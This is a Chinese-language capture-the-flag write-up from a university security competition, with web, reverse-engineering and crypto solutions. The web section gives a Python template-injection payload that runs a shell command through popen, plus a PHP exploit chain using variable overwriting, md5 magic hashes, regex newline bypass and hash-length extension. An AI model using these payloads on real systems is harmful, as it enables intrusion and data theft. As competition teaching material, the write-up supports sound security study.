第九届中国海洋大学信息安全竞赛WP

战队：D0sec

队员：xiaolaisec

WEB

菜狗工具#1

删除JS里的disable让运行键可点击

Exp:print(''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat app.py').read()

ezPHP

<?php

include "flag.php";

highlight_file(__FILE__);

error_reporting(0);

$a = 'O.U.C';

$query = $_SERVER['QUERY_STRING'];    //获取GET传递的参数名和值

parse_str($query);

if (preg_match('/_|%5f|\.|%2E/i',$query)){

    die('听说你是黑客');

}

echo '你知道b等于什么能绕过这个弱类型吗（〃｀ 3′〃）'.'<br>';

if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){   

//这里要用$_SERVER['QUERY_STRING']全局变量覆盖变量a的值，

因为md5('O.U.C')不是0e开头无法md5爆破，（妹的爆破了一个下午才意识到这点

?a=s878926199a&b=s155964671a 覆盖a的值找两个md5若相等的值即可

    echo "哎呦，不错喔".'<br>';

    $O_U_C=$_GET['O_U_C'];

if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){

//两点：第一点是$_GET['O_U_C']传参写成O U C   url编码一下O%20U%20C绕过正则

第二点是100%0a绕过preg_match('/^100$/',$O_U_C)，$不匹配换行符

        echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';

        if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){

//这个简单数组绕过即可

            echo '好，那么好'.'<br>';

            if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){

//md5 hash扩展攻击，由于$secret长度未知，只能试了，最终长度是15

//当然也可以直接通过$_SERVER['QUERY_STRING']全局变量改变$secret的值

                echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;

            }else{

                echo '告诉你secret的md5值也无妨，反正哈希是不可逆的๑乛◡乛๑，除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';

            }

        }else{

            echo '不过如此';

        }

    }else{

        die("不行嘛(´ｪ｀)");

    }

}else{

    echo '嗨害嗨  (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';

}

pyload:

?a=s878926199a&b=s155964671a&O%20U%20C=100%0a&md5=ouc%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00aaa

post:  md51[]=1&md52[]=2

Cookie: md5=9a6197a1c86ccf149c6588f020d7a5e8

Reverse

xor++

放IDA进到main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[48]; // [rsp+0h] [rbp-80h]
  __int64 v5[8]; // [rsp+30h] [rbp-50h] BYREF
  unsigned int i; // [rsp+74h] [rbp-Ch]
  int v7; // [rsp+78h] [rbp-8h]
  int v8; // [rsp+7Ch] [rbp-4h]

  v5[0] = 0LL;
  v5[1] = 0LL;
  v5[2] = 0LL;
  v5[3] = 0LL;
  v5[4] = 0LL;
  v5[5] = 0LL;
  v5[6] = 0LL;
  v5[7] = 0LL;
  v4[0] = 37;
  v4[1] = 40;
  v4[2] = 36;
  v4[3] = 33;
  v4[4] = 60;
  v4[5] = 42;
  v4[6] = 60;
  v4[7] = 30;
  v4[8] = 20;
  v4[9] = 40;
  v4[10] = 36;
  v4[11] = 40;
  v4[12] = 41;
  v4[13] = 97;
  v4[14] = 50;
  v4[15] = 39;
  v4[16] = 63;
  v4[17] = 32;
  v4[18] = 12;
  v4[19] = 9;
  v4[20] = 32;
  v4[21] = 104;
  v4[22] = 55;
  v4[23] = 46;
  v4[24] = 4;
  v4[25] = 63;
  v4[26] = 53;
  v4[27] = 106;
  v4[28] = 17;
  v4[29] = 7;
  v4[30] = 4;
  v4[31] = 61;
  v4[32] = 14;
  v4[33] = 17;
  v4[34] = 38;
  v4[35] = 14;
  v4[36] = 26;
  puts("Guess what is the flag?");
  __isoc99_scanf("%50s", v5);
  v8 = 67;
  v7 = 1;
  for ( i = 0; i <= 0x24; ++i )
  {
    if ( (v8 ^ *((char *)v5 + (int)i)) != v4[i] )
    {
      v7 = 0;
      break;
    }
    ++v8;
  }
  if ( v7 )
    puts("That is the right answer!");
  else
    puts("Wrong answer sadly...");
  return 0;
}

简单的异或，a^b=c，那么b=c^a

Exp:

v4 = [37, 40, 36, 33, 60, 42, 60, 30, 20, 40, 36, 40, 41, 97, 50, 39, 63, 32, 12, 9, 32, 104, 55, 46, 4, 63, 53, 106, 17, 7, 4, 61, 14, 17, 38, 14, 26]
# 用于存储结果的数组
result = []
# 预设的值v8
v8 = 67
# 逐个字符进行异或操作，并将结果存储到result数组中
for i in range(len(v4)):
    result.append(chr(v4[i] ^ v8))
    v8 += 1
# 输出得到的字符串
print(''.join(result))

Crypto

NeXT RSA

Exp:

import sympy
import libnum

# 给定的参数
n = 80044118049755180996754407858488943779355738585718372337839486032339412481191013051614126608584578841408197524632831442032118319629160505851518198448787590483634506563248531254421862061651099856312546562506221294620627871718678484548245902274972044599314097339549053518589561289734819710218838311181044519738709148493164321955860982700783886286661558574861608455547990794798848491695189544811325833194530596317989718866319530140199263278168146224240677087191093183415595617994125075880280632369616506148501757653260154487000183157405531772172082897743929126980157956142627803176227942226654177011633301413616266656761
e = 65537
c = 
23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544
# 分解 n 得到 p 和 q
p, q = sympy.factorint(n)

# 计算欧拉函数
r = (p - 1) * (q - 1)

# 计算私钥
d = libnum.invmod(e, r)

# 使用私钥解密密文
m = pow(c, d, n)

# 将解密后的明文转换成字符串
flag = libnum.n2s(m)
print(flag)
#flag{n0t_s3Cure_4t_aIl}

模！

Exp:

from math import factorial

# 逆向计算哈希值，找到原始的字符串
def reverse_hash(hash_value):
    table = "abcdefghijklmnopqrstuvwxyz{}"
    original_str = ""
    while hash_value > 0:
        # 逐位逆向计算
        for char in table:
            if factorial(ord(char)) % 233 == hash_value & 0xFF:
                original_str = char + original_str
                hash_value >>= 8
                break
    return original_str

# 给定的哈希值
hashed_value = 2508450541438803643416583335895451914701844680466330955847
# 尝试找到原始的字符串
original_string = reverse_hash(hashed_value)
print("Original String:", original_string)
#flag{dalaodalaohaolihai}

Base64*rot13

MzkuM3gyrzI6Z3cyrzHlMKcSra0=

先rot13解密再base64解码即可